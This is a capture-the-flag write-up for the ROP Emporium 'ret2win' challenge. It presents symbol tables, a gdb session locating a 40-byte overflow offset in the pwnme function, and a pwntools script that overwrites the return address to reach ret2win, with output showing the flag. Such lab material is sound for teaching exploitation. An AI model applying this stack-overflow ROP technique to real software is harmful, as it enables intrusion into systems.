    62: 00000000004005e0     2 FUNC    GLOBAL HIDDEN    13 _dl_relocate_sta[...]
    63: 00000000004005b0    43 FUNC    GLOBAL DEFAULT   13 _start
    64: 0000000000601058     0 NOTYPE  GLOBAL DEFAULT   24 __bss_start
    65: 0000000000400697    81 FUNC    GLOBAL DEFAULT   13 main
    66: 0000000000000000     0 FUNC    GLOBAL DEFAULT  UND setvbuf@@GLIBC_2.2.5
    67: 0000000000601058     0 OBJECT  GLOBAL HIDDEN    23 __TMC_END__
    68: 0000000000400528     0 FUNC    GLOBAL DEFAULT   11 _init</pre><pre class="hljs"><code>Symbol table <span class="hljs-string">&#x27;.symtab&#x27;</span> contains 69 entries:
   Num:    Value          Size<span class="hljs-built_in"> Type </span>   Bind   Vis      Ndx Name
     0: 0000000000000000     0 NOTYPE  LOCAL <span class="hljs-built_in"> DEFAULT </span> UND 
     1: 0000000000400238     0 SECTION LOCAL <span class="hljs-built_in"> DEFAULT </span>   1 
     2: 0000000000400254     0 SECTION LOCAL <span class="hljs-built_in"> DEFAULT </span>   2 
     3: 0000000000400274     0 SECTION LOCAL <span class="hljs-built_in"> DEFAULT </span>   3 
     4: 0000000000400298     0 SECTION LOCAL <span class="hljs-built_in"> DEFAULT </span>   4 
     5: 00000000004002c0     0 SECTION LOCAL <span class="hljs-built_in"> DEFAULT </span>   5 
     6: 00000000004003b0     0 SECTION LOCAL <span class="hljs-built_in"> DEFAULT </span>   6 
     7: 0000000000400416     0 SECTION LOCAL <span class="hljs-built_in"> DEFAULT </span>   7 
     8: 0000000000400430     0 SECTION LOCAL <span class="hljs-built_in"> DEFAULT </span>   8 
     9: 0000000000400450     0 SECTION LOCAL <span class="hljs-built_in"> DEFAULT </span>   9 
    10: 0000000000400498     0 SECTION LOCAL <span class="hljs-built_in"> DEFAULT </span>  10 
    11: 0000000000400528     0 SECTION LOCAL <span class="hljs-built_in"> DEFAULT </span>  11 
    12: 0000000000400540     0 SECTION LOCAL <span class="hljs-built_in"> DEFAULT </span>  12 
    13: 00000000004005b0     0 SECTION LOCAL <span class="hljs-built_in"> DEFAULT </span>  13 
    14: 00000000004007f4     0 SECTION LOCAL <span class="hljs-built_in"> DEFAULT </span>  14 
    15: 0000000000400800     0 SECTION LOCAL <span class="hljs-built_in"> DEFAULT </span>  15 
    16: 0000000000400958     0 SECTION LOCAL <span class="hljs-built_in"> DEFAULT </span>  16 
    17: 00000000004009a8     0 SECTION LOCAL <span class="hljs-built_in"> DEFAULT </span>  17 
    18: 0000000000600e10     0 SECTION LOCAL <span class="hljs-built_in"> DEFAULT </span>  18 
    19: 0000000000600e18     0 SECTION LOCAL <span class="hljs-built_in"> DEFAULT </span>  19 
    20: 0000000000600e20     0 SECTION LOCAL <span class="hljs-built_in"> DEFAULT </span>  20 
    21: 0000000000600ff0     0 SECTION LOCAL <span class="hljs-built_in"> DEFAULT </span>  21 
    22: 0000000000601000     0 SECTION LOCAL <span class="hljs-built_in"> DEFAULT </span>  22 
    23: 0000000000601048     0 SECTION LOCAL <span class="hljs-built_in"> DEFAULT </span>  23 
    24: 0000000000601058     0 SECTION LOCAL <span class="hljs-built_in"> DEFAULT </span>  24 
    25: 0000000000000000     0 SECTION LOCAL <span class="hljs-built_in"> DEFAULT </span>  25 
    26: 0000000000000000     0 FILE    LOCAL <span class="hljs-built_in"> DEFAULT </span> ABS crtstuff.c
    27: 00000000004005f0     0 FUNC    LOCAL <span class="hljs-built_in"> DEFAULT </span>  13 deregister_tm_clones
    28: 0000000000400620     0 FUNC    LOCAL <span class="hljs-built_in"> DEFAULT </span>  13 register_tm_clones
    29: 0000000000400660     0 FUNC    LOCAL <span class="hljs-built_in"> DEFAULT </span>  13 __do_global_dtors_aux
    30: 0000000000601060     1 OBJECT  LOCAL <span class="hljs-built_in"> DEFAULT </span>  24 completed.7698
    31: 0000000000600e18     0 OBJECT  LOCAL <span class="hljs-built_in"> DEFAULT </span>  19 __do_global_dtor[<span class="hljs-built_in">..</span>.]
    32: 0000000000400690     0 FUNC    LOCAL <span class="hljs-built_in"> DEFAULT </span>  13 frame_dummy
    33: 0000000000600e10     0 OBJECT  LOCAL <span class="hljs-built_in"> DEFAULT </span>  18 __frame_dummy_in[<span class="hljs-built_in">..</span>.]
    34: 0000000000000000     0 FILE    LOCAL <span class="hljs-built_in"> DEFAULT </span> ABS ret2win.c
    35: 00000000004006e8   110 FUNC    LOCAL <span class="hljs-built_in"> DEFAULT </span>  13 pwnme
    36: 0000000000400756    27 FUNC    LOCAL <span class="hljs-built_in"> DEFAULT </span>  13 ret2win
    37: 0000000000000000     0 FILE    LOCAL <span class="hljs-built_in"> DEFAULT </span> ABS crtstuff.c
    38: 0000000000400ae4     0 OBJECT  LOCAL <span class="hljs-built_in"> DEFAULT </span>  17 __FRAME_END__
    39: 0000000000000000     0 FILE    LOCAL <span class="hljs-built_in"> DEFAULT </span> ABS 
    40: 0000000000600e18     0 NOTYPE  LOCAL <span class="hljs-built_in"> DEFAULT </span>  18 __init_array_end
    41: 0000000000600e20     0 OBJECT  LOCAL <span class="hljs-built_in"> DEFAULT </span>  20 _DYNAMIC
    42: 0000000000600e10     0 NOTYPE  LOCAL <span class="hljs-built_in"> DEFAULT </span>  18 __init_array_start
    43: 0000000000400958     0 NOTYPE  LOCAL <span class="hljs-built_in"> DEFAULT </span>  16 __GNU_EH_FRAME_HDR
    44: 0000000000601000     0 OBJECT  LOCAL <span class="hljs-built_in"> DEFAULT </span>  22 _GLOBAL_OFFSET_TABLE_
    45: 00000000004007f0     2 FUNC    GLOBAL<span class="hljs-built_in"> DEFAULT </span>  13 __libc_csu_fini
    46: 0000000000601058     8 OBJECT  GLOBAL<span class="hljs-built_in"> DEFAULT </span>  24 stdout@@GLIBC_2.2.5
    47: 0000000000601048     0 NOTYPE  WEAK  <span class="hljs-built_in"> DEFAULT </span>  23 data_start
    48: 0000000000000000     0 FUNC    GLOBAL<span class="hljs-built_in"> DEFAULT </span> UND puts@@GLIBC_2.2.5
    49: 0000000000601058     0 NOTYPE  GLOBAL<span class="hljs-built_in"> DEFAULT </span>  23 _edata
    50: 00000000004007f4     0 FUNC    GLOBAL<span class="hljs-built_in"> DEFAULT </span>  14 _fini
    51: 0000000000000000     0 FUNC    GLOBAL<span class="hljs-built_in"> DEFAULT </span> UND system@@GLIBC_2.2.5
    52: 0000000000000000     0 FUNC    GLOBAL<span class="hljs-built_in"> DEFAULT </span> UND printf@@GLIBC_2.2.5
    53: 0000000000000000     0 FUNC    GLOBAL<span class="hljs-built_in"> DEFAULT </span> UND memset@@GLIBC_2.2.5
    54: 0000000000000000     0 FUNC    GLOBAL<span class="hljs-built_in"> DEFAULT </span> UND read@@GLIBC_2.2.5
    55: 0000000000000000     0 FUNC    GLOBAL<span class="hljs-built_in"> DEFAULT </span> UND __libc_start_mai[<span class="hljs-built_in">..</span>.]
    56: 0000000000601048     0 NOTYPE  GLOBAL<span class="hljs-built_in"> DEFAULT </span>  23 __data_start
    57: 0000000000000000     0 NOTYPE  WEAK  <span class="hljs-built_in"> DEFAULT </span> UND __gmon_start__
    58: 0000000000601050     0 OBJECT  GLOBAL HIDDEN    23 __dso_handle
    59: 0000000000400800     4 OBJECT  GLOBAL<span class="hljs-built_in"> DEFAULT </span>  15 _IO_stdin_used
    60: 0000000000400780   101 FUNC    GLOBAL<span class="hljs-built_in"> DEFAULT </span>  13 __libc_csu_init
    61: 0000000000601068     0 NOTYPE  GLOBAL<span class="hljs-built_in"> DEFAULT </span>  24 _end
    62: 00000000004005e0     2 FUNC    GLOBAL HIDDEN    13 _dl_relocate_sta[<span class="hljs-built_in">..</span>.]
    63: 00000000004005b0    43 FUNC    GLOBAL<span class="hljs-built_in"> DEFAULT </span>  13 _start
    64: 0000000000601058     0 NOTYPE  GLOBAL<span class="hljs-built_in"> DEFAULT </span>  24 __bss_start
    65: 0000000000400697    81 FUNC    GLOBAL<span class="hljs-built_in"> DEFAULT </span>  13 main
    66: 0000000000000000     0 FUNC    GLOBAL<span class="hljs-built_in"> DEFAULT </span> UND setvbuf@@GLIBC_2.2.5
    67: 0000000000601058     0 OBJECT  GLOBAL HIDDEN    23 __TMC_END__
    68: 0000000000400528     0 FUNC    GLOBAL<span class="hljs-built_in"> DEFAULT </span>  11 _init</code></pre></div>
<p><mark>main function</mark></p>
<ul>
<li>
<ul>
<li>on disassmble main we found that it calls pwnme function<br>
<img src="_resources/df080bf8269a4f44a484583adef4a5b6.png" alt="59ec07d41a175d2d4fb7fc342ccdf5dd.png"></li>
</ul>
</li>
</ul>
<p><mark>pwnme function</mark></p>
<ul>
<li>
<ul>
<li>We can clearly see a buffer overflow vulnerability in pwnme function.<br>
<img src="_resources/15725d49c91d4dd39ce69b2cea161be6.png" alt="d7c1488142ecdfee89738e0cd8fd40c6.png"></li>
</ul>
</li>
</ul>
<h1 id="exploit">Exploit</h1>
<p>ROP ATTACK<br>
GADGET - RET<br>
We overflow a stack to force RIP to call a required function in order to obtain the flag.</p>
<h1 id="finding-offset">Finding offset</h1>
<div class="joplin-editable"><pre class="joplin-source" data-joplin-language="" data-joplin-source-open="```&#10;" data-joplin-source-close="&#10;```">&gt; AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbA
Thank you!

Program received signal SIGSEGV, Segmentation fault.
[----------------------------------registers-----------------------------------]
RAX: 0xb ('\x0b')
RBX: 0x400780 (&lt;__libc_csu_init&gt;:	push   r15)
RCX: 0x7ffff7eb9c27 (&lt;__GI___libc_write+23&gt;:	cmp    rax,0xfffffffffffff000)
RDX: 0x0 
RSI: 0x7ffff7f93743 --&gt; 0xf95670000000000a 
RDI: 0x7ffff7f95670 --&gt; 0x0 
RBP: 0x6141414541412941 ('A)AAEAAa')
RSP: 0x7fffffffddd8 (&quot;AA0AAFAAbA\n&quot;)
RIP: 0x400755 (&lt;pwnme+109&gt;:	ret)
R8 : 0xb ('\x0b')
R9 : 0x7ffff7fdab50 (endbr64)
R10: 0xfffffffffffffb6b 
R11: 0x246 
R12: 0x4005b0 (&lt;_start&gt;:	xor    ebp,ebp)
R13: 0x0 
R14: 0x0 
R15: 0x0
EFLAGS: 0x10246 (carry PARITY adjust ZERO sign trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
   0x40074e &lt;pwnme+102&gt;:	call   0x400550 &lt;puts@plt&gt;
   0x400753 &lt;pwnme+107&gt;:	nop
   0x400754 &lt;pwnme+108&gt;:	leave  
=&gt; 0x400755 &lt;pwnme+109&gt;:	ret    
   0x400756 &lt;ret2win&gt;:	push   rbp
   0x400757 &lt;ret2win+1&gt;:	mov    rbp,rsp
   0x40075a &lt;ret2win+4&gt;:	mov    edi,0x400926
   0x40075f &lt;ret2win+9&gt;:	call   0x400550 &lt;puts@plt&gt;
[------------------------------------stack-------------------------------------]
0000| 0x7fffffffddd8 (&quot;AA0AAFAAbA\n&quot;)
0008| 0x7fffffffdde0 --&gt; 0xa4162 ('bA\n')
0016| 0x7fffffffdde8 --&gt; 0x7ffff7dda565 (&lt;__libc_start_main+213&gt;:	mov    edi,eax)
0024| 0x7fffffffddf0 --&gt; 0x7fffffffded8 --&gt; 0x7fffffffe21e (&quot;/home/pwn0x80/Documents/ctfs/rop/ret2wins/ret2win&quot;)
0032| 0x7fffffffddf8 --&gt; 0x1f7fc7000 
0040| 0x7fffffffde00 --&gt; 0x400697 (&lt;main&gt;:	push   rbp)
0048| 0x7fffffffde08 --&gt; 0x7fffffffe1f9 --&gt; 0x48228dfe71299143 
0056| 0x7fffffffde10 --&gt; 0x400780 (&lt;__libc_csu_init&gt;:	push   r15)
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
Stopped reason: SIGSEGV
0x0000000000400755 in pwnme ()
gdb-peda$ pattern search AA0AAFAAbA\n
Registers contain pattern buffer:
RBP+0 found at offset: 32
Registers point to pattern buffer:
[RSP] --&gt; offset 40 - size ~12
Pattern buffer found at:
0x00007fffffffddb0 : offset    0 - size   50 ($sp + -0x28 [-10 dwords])
References to pattern buffer found at:
0x00007fffffffb608 : 0x00007fffffffddb0 ($sp + -0x27d0 [-2548 dwords])
0x00007fffffffb720 : 0x00007fffffffddb0 ($sp + -0x26b8 [-2478 dwords])
0x00007fffffffda00 : 0x00007fffffffddb0 ($sp + -0x3d8 [-246 dwords])
0x00007fffffffda18 : 0x00007fffffffddb0 ($sp + -0x3c0 [-240 dwords])
</pre><pre class="hljs"><code><span class="hljs-string">&gt;</span> <span class="hljs-string">AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbA</span>
<span class="hljs-string">Thank</span> <span class="hljs-string">you!</span>

<span class="hljs-string">Program</span> <span class="hljs-string">received</span> <span class="hljs-string">signal</span> <span class="hljs-string">SIGSEGV,</span> <span class="hljs-string">Segmentation</span> <span class="hljs-string">fault.</span>
[<span class="hljs-string">----------------------------------registers-----------------------------------</span>]
<span class="hljs-attr">RAX:</span> <span class="hljs-number">0xb</span> <span class="hljs-string">(&#x27;\x0b&#x27;)</span>
<span class="hljs-attr">RBX:</span> <span class="hljs-number">0x400780</span> <span class="hljs-string">(&lt;__libc_csu_init&gt;:</span>	<span class="hljs-string">push</span>   <span class="hljs-string">r15)</span>
<span class="hljs-attr">RCX:</span> <span class="hljs-number">0x7ffff7eb9c27</span> <span class="hljs-string">(&lt;__GI___libc_write+23&gt;:</span>	<span class="hljs-string">cmp</span>    <span class="hljs-string">rax,0xfffffffffffff000)</span>
<span class="hljs-attr">RDX:</span> <span class="hljs-number">0x0</span> 
<span class="hljs-attr">RSI:</span> <span class="hljs-number">0x7ffff7f93743</span> <span class="hljs-string">--&gt;</span> <span class="hljs-number">0xf95670000000000a</span> 
<span class="hljs-attr">RDI:</span> <span class="hljs-number">0x7ffff7f95670</span> <span class="hljs-string">--&gt;</span> <span class="hljs-number">0x0</span> 
<span class="hljs-attr">RBP:</span> <span class="hljs-number">0x6141414541412941</span> <span class="hljs-string">(&#x27;A)AAEAAa&#x27;)</span>
<span class="hljs-attr">RSP:</span> <span class="hljs-number">0x7fffffffddd8</span> <span class="hljs-string">(&quot;AA0AAFAAbA\n&quot;)</span>
<span class="hljs-attr">RIP:</span> <span class="hljs-number">0x400755</span> <span class="hljs-string">(&lt;pwnme+109&gt;:</span>	<span class="hljs-string">ret)</span>
<span class="hljs-attr">R8 :</span> <span class="hljs-number">0xb</span> <span class="hljs-string">(&#x27;\x0b&#x27;)</span>
<span class="hljs-attr">R9 :</span> <span class="hljs-number">0x7ffff7fdab50</span> <span class="hljs-string">(endbr64)</span>
<span class="hljs-attr">R10:</span> <span class="hljs-number">0xfffffffffffffb6b</span> 
<span class="hljs-attr">R11:</span> <span class="hljs-number">0x246</span> 
<span class="hljs-attr">R12:</span> <span class="hljs-number">0x4005b0</span> <span class="hljs-string">(&lt;_start&gt;:</span>	<span class="hljs-string">xor</span>    <span class="hljs-string">ebp,ebp)</span>
<span class="hljs-attr">R13:</span> <span class="hljs-number">0x0</span> 
<span class="hljs-attr">R14:</span> <span class="hljs-number">0x0</span> 
<span class="hljs-attr">R15:</span> <span class="hljs-number">0x0</span>
<span class="hljs-attr">EFLAGS:</span> <span class="hljs-number">0x10246</span> <span class="hljs-string">(carry</span> <span class="hljs-string">PARITY</span> <span class="hljs-string">adjust</span> <span class="hljs-string">ZERO</span> <span class="hljs-string">sign</span> <span class="hljs-string">trap</span> <span class="hljs-string">INTERRUPT</span> <span class="hljs-string">direction</span> <span class="hljs-string">overflow)</span>
[<span class="hljs-string">-------------------------------------code-------------------------------------</span>]
   <span class="hljs-number">0x40074e</span> <span class="hljs-string">&lt;pwnme+102&gt;:</span>	<span class="hljs-string">call</span>   <span class="hljs-number">0x400550</span> <span class="hljs-string">&lt;puts@plt&gt;</span>
   <span class="hljs-number">0x400753</span> <span class="hljs-string">&lt;pwnme+107&gt;:</span>	<span class="hljs-string">nop</span>
   <span class="hljs-number">0x400754</span> <span class="hljs-string">&lt;pwnme+108&gt;:</span>	<span class="hljs-string">leave</span>  
<span class="hljs-string">=&gt;</span> <span class="hljs-number">0x400755</span> <span class="hljs-string">&lt;pwnme+109&gt;:</span>	<span class="hljs-string">ret</span>    
   <span class="hljs-number">0x400756</span> <span class="hljs-string">&lt;ret2win&gt;:</span>	<span class="hljs-string">push</span>   <span class="hljs-string">rbp</span>
   <span class="hljs-number">0x400757</span> <span class="hljs-string">&lt;ret2win+1&gt;:</span>	<span class="hljs-string">mov</span>    <span class="hljs-string">rbp,rsp</span>
   <span class="hljs-number">0x40075a</span> <span class="hljs-string">&lt;ret2win+4&gt;:</span>	<span class="hljs-string">mov</span>    <span class="hljs-string">edi,0x400926</span>
   <span class="hljs-number">0x40075f</span> <span class="hljs-string">&lt;ret2win+9&gt;:</span>	<span class="hljs-string">call</span>   <span class="hljs-number">0x400550</span> <span class="hljs-string">&lt;puts@plt&gt;</span>
[<span class="hljs-string">------------------------------------stack-------------------------------------</span>]
<span class="hljs-number">0000</span><span class="hljs-string">|</span> <span class="hljs-number">0x7fffffffddd8</span> <span class="hljs-string">(&quot;AA0AAFAAbA\n&quot;)</span>
<span class="hljs-number">0008</span><span class="hljs-string">|</span> <span class="hljs-number">0x7fffffffdde0</span> <span class="hljs-string">--&gt;</span> <span class="hljs-number">0xa4162</span> <span class="hljs-string">(&#x27;bA\n&#x27;)</span>
<span class="hljs-number">0016</span><span class="hljs-string">|</span> <span class="hljs-number">0x7fffffffdde8</span> <span class="hljs-string">--&gt;</span> <span class="hljs-number">0x7ffff7dda565</span> <span class="hljs-string">(&lt;__libc_start_main+213&gt;:</span>	<span class="hljs-string">mov</span>    <span class="hljs-string">edi,eax)</span>
<span class="hljs-number">0024</span><span class="hljs-string">|</span> <span class="hljs-number">0x7fffffffddf0</span> <span class="hljs-string">--&gt;</span> <span class="hljs-number">0x7fffffffded8</span> <span class="hljs-string">--&gt;</span> <span class="hljs-number">0x7fffffffe21e</span> <span class="hljs-string">(&quot;/home/pwn0x80/Documents/ctfs/rop/ret2wins/ret2win&quot;)</span>
<span class="hljs-number">0032</span><span class="hljs-string">|</span> <span class="hljs-number">0x7fffffffddf8</span> <span class="hljs-string">--&gt;</span> <span class="hljs-number">0x1f7fc7000</span> 
<span class="hljs-number">0040</span><span class="hljs-string">|</span> <span class="hljs-number">0x7fffffffde00</span> <span class="hljs-string">--&gt;</span> <span class="hljs-number">0x400697</span> <span class="hljs-string">(&lt;main&gt;:</span>	<span class="hljs-string">push</span>   <span class="hljs-string">rbp)</span>
<span class="hljs-number">0048</span><span class="hljs-string">|</span> <span class="hljs-number">0x7fffffffde08</span> <span class="hljs-string">--&gt;</span> <span class="hljs-number">0x7fffffffe1f9</span> <span class="hljs-string">--&gt;</span> <span class="hljs-number">0x48228dfe71299143</span> 
<span class="hljs-number">0056</span><span class="hljs-string">|</span> <span class="hljs-number">0x7fffffffde10</span> <span class="hljs-string">--&gt;</span> <span class="hljs-number">0x400780</span> <span class="hljs-string">(&lt;__libc_csu_init&gt;:</span>	<span class="hljs-string">push</span>   <span class="hljs-string">r15)</span>
[<span class="hljs-string">------------------------------------------------------------------------------</span>]
<span class="hljs-attr">Legend:</span> <span class="hljs-string">code,</span> <span class="hljs-string">data,</span> <span class="hljs-string">rodata,</span> <span class="hljs-string">value</span>
<span class="hljs-attr">Stopped reason:</span> <span class="hljs-string">SIGSEGV</span>
<span class="hljs-number">0x0000000000400755</span> <span class="hljs-string">in</span> <span class="hljs-string">pwnme</span> <span class="hljs-string">()</span>
<span class="hljs-string">gdb-peda$</span> <span class="hljs-string">pattern</span> <span class="hljs-string">search</span> <span class="hljs-string">AA0AAFAAbA\n</span>
<span class="hljs-attr">Registers contain pattern buffer:</span>
<span class="hljs-string">RBP+0</span> <span class="hljs-attr">found at offset:</span> <span class="hljs-number">32</span>
<span class="hljs-attr">Registers point to pattern buffer:</span>
[<span class="hljs-string">RSP</span>] <span class="hljs-string">--&gt;</span> <span class="hljs-string">offset</span> <span class="hljs-number">40</span> <span class="hljs-bullet">-</span> <span class="hljs-string">size</span> <span class="hljs-string">~12</span>
<span class="hljs-attr">Pattern buffer found at:</span>
<span class="hljs-attr">0x00007fffffffddb0 :</span> <span class="hljs-string">offset</span>    <span class="hljs-number">0</span> <span class="hljs-bullet">-</span> <span class="hljs-string">size</span>   <span class="hljs-number">50</span> <span class="hljs-string">($sp</span> <span class="hljs-string">+</span> <span class="hljs-number">-0x28</span> [<span class="hljs-number">-10</span> <span class="hljs-string">dwords</span>]<span class="hljs-string">)</span>
<span class="hljs-attr">References to pattern buffer found at:</span>
<span class="hljs-attr">0x00007fffffffb608 :</span> <span class="hljs-number">0x00007fffffffddb0</span> <span class="hljs-string">($sp</span> <span class="hljs-string">+</span> <span class="hljs-number">-0x27d0</span> [<span class="hljs-number">-2548</span> <span class="hljs-string">dwords</span>]<span class="hljs-string">)</span>
<span class="hljs-attr">0x00007fffffffb720 :</span> <span class="hljs-number">0x00007fffffffddb0</span> <span class="hljs-string">($sp</span> <span class="hljs-string">+</span> <span class="hljs-number">-0x26b8</span> [<span class="hljs-number">-2478</span> <span class="hljs-string">dwords</span>]<span class="hljs-string">)</span>
<span class="hljs-attr">0x00007fffffffda00 :</span> <span class="hljs-number">0x00007fffffffddb0</span> <span class="hljs-string">($sp</span> <span class="hljs-string">+</span> <span class="hljs-number">-0x3d8</span> [<span class="hljs-number">-246</span> <span class="hljs-string">dwords</span>]<span class="hljs-string">)</span>
<span class="hljs-attr">0x00007fffffffda18 :</span> <span class="hljs-number">0x00007fffffffddb0</span> <span class="hljs-string">($sp</span> <span class="hljs-string">+</span> <span class="hljs-number">-0x3c0</span> [<span class="hljs-number">-240</span> <span class="hljs-string">dwords</span>]<span class="hljs-string">)</span>
</code></pre></div>
<p>The offset is <code class="inline-code">40</code></p>
<p>The stack frame for this exploit should look like this.<br>
<img src="_resources/35beef3276c1461b9bb34b3b7511b2e0.png" alt="e177c09f9cd819b24273de17b1286d61.png"></p>
<p>Here's an refernce of a function call stack for your convenience.<br>
<img src="_resources/286731686f3b40dcb942cbde848a61d7.png" alt="7596f28e1c76bc43f2a487df4a178abd.png"></p>
<ul>
<li>Exploit source code written in python3 using pwntool</li>
</ul>
<div class="joplin-editable"><pre class="joplin-source" data-joplin-language="" data-joplin-source-open="```&#10;" data-joplin-source-close="&#10;```"># https://ropemporium.com/challenge/ret2win.html
# ROPE{a_placeholder_32byte_flag!}
# x86_64
# ropemporium.com
# https://github.com/aditya0x80/writeups/blob/main/ropemporium/ret2win.py
from pwn import *

exp = process(&quot;./ret2win&quot;)
ret2win = p64(0x400756)
padding = b'A'*40
ret = p64(0x40053e)
payload = padding + ret + ret2win
exp.sendline(payload)
print(exp.recvall().decode())
</pre><pre class="hljs"><code><span class="hljs-comment"># https://ropemporium.com/challenge/ret2win.html</span>
<span class="hljs-comment"># ROPE{a_placeholder_32byte_flag!}</span>
<span class="hljs-comment"># x86_64</span>
<span class="hljs-comment"># ropemporium.com</span>
<span class="hljs-comment"># https://github.com/aditya0x80/writeups/blob/main/ropemporium/ret2win.py</span>
<span class="hljs-attribute">from</span> pwn import *

<span class="hljs-attribute">exp</span> = process(<span class="hljs-string">&quot;./ret2win&quot;</span>)
<span class="hljs-attribute">ret2win</span> = p<span class="hljs-number">64</span>(<span class="hljs-number">0</span>x<span class="hljs-number">400756</span>)
<span class="hljs-attribute">padding</span> = b&#x27;A&#x27;*<span class="hljs-number">40</span>
<span class="hljs-attribute">ret</span> = p<span class="hljs-number">64</span>(<span class="hljs-number">0</span>x<span class="hljs-number">40053</span>e)
<span class="hljs-attribute">payload</span> = padding + ret + ret<span class="hljs-number">2</span>win
<span class="hljs-attribute">exp</span>.sendline(payload)
<span class="hljs-attribute">print</span>(exp.recvall().decode())
</code></pre></div>
<div class="joplin-editable"><pre class="joplin-source" data-joplin-language="" data-joplin-source-open="```&#10;" data-joplin-source-close="&#10;```">[*] '/home/pwn0x80/Documents/ctfs/rop/ret2wins/ret2win'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x400000)
[+] Starting local process '/home/pwn0x80/Documents/ctfs/rop/ret2wins/ret2win': pid 31101
[+] Receiving all data: Done (296B)
[*] Process '/home/pwn0x80/Documents/ctfs/rop/ret2wins/ret2win' stopped with exit code -11 (SIGSEGV) (pid 31101)
ret2win by ROP Emporium
x86_64

For my first trick, I will attempt to fit 56 bytes of user input into 32 bytes of stack buffer!
What could possibly go wrong?
You there, may I have your input please? And don't worry about null bytes, we're using read()!

&gt; Thank you!
Well done! Here's your flag: ROPE{a_placeholder_32byte_flag!}

</pre><pre class="hljs"><code>[*] <span class="hljs-string">&#x27;/home/pwn0x80/Documents/ctfs/rop/ret2wins/ret2win&#x27;</span>
    Arch:     amd64<span class="hljs-number">-64</span>-little
    RELRO:    Partial RELRO
    Stack:    <span class="hljs-keyword">No</span> canary <span class="hljs-built_in">found</span>
    NX:       NX enabled
    PIE:      <span class="hljs-keyword">No</span> PIE (<span class="hljs-number">0x400000</span>)
[+] Starting <span class="hljs-keyword">local</span> process <span class="hljs-string">&#x27;/home/pwn0x80/Documents/ctfs/rop/ret2wins/ret2win&#x27;</span>: pid <span class="hljs-number">31101</span>
[+] Receiving <span class="hljs-keyword">all</span> data: Done (<span class="hljs-number">296</span>B)
[*] Process <span class="hljs-string">&#x27;/home/pwn0x80/Documents/ctfs/rop/ret2wins/ret2win&#x27;</span> stopped <span class="hljs-keyword">with</span> <span class="hljs-keyword">exit</span> code <span class="hljs-number">-11</span> (SIGSEGV) (pid <span class="hljs-number">31101</span>)
ret2win <span class="hljs-keyword">by</span> ROP Emporium
x86_64

<span class="hljs-keyword">For</span> my first trick, I will attempt <span class="hljs-keyword">to</span> fit <span class="hljs-number">56</span> bytes <span class="hljs-keyword">of</span> <span class="hljs-keyword">user</span> <span class="hljs-keyword">input</span> <span class="hljs-keyword">into</span> <span class="hljs-number">32</span> bytes <span class="hljs-keyword">of</span> stack buffer!
What could possibly go wrong?
You there, may I have your <span class="hljs-keyword">input</span> please? <span class="hljs-keyword">And</span> don<span class="hljs-string">&#x27;t worry about null bytes, we&#x27;</span>re <span class="hljs-keyword">using</span> <span class="hljs-keyword">read</span>()!

&gt; Thank you!
Well done! Her<span class="hljs-string">e&#x27;s your flag: ROPE{a_placeholder_32byte_flag!}

</span></code></pre></div>
<p><a data-from-md title='https://github.com/aditya0x80/writeups/blob/main/ropemporium/ret2win.py' href='https://github.com/aditya0x80/writeups/blob/main/ropemporium/ret2win.py'>https://github.com/aditya0x80/writeups/blob/main/ropemporium/ret2win.py</a><br>
link to the challenge: <a data-from-md title='https://ropemporium.com/challenge/ret2win.html' href='https://ropemporium.com/challenge/ret2win.html'>https://ropemporium.com/challenge/ret2win.html</a></p>
</div></div>
					</body>
				</html>
			
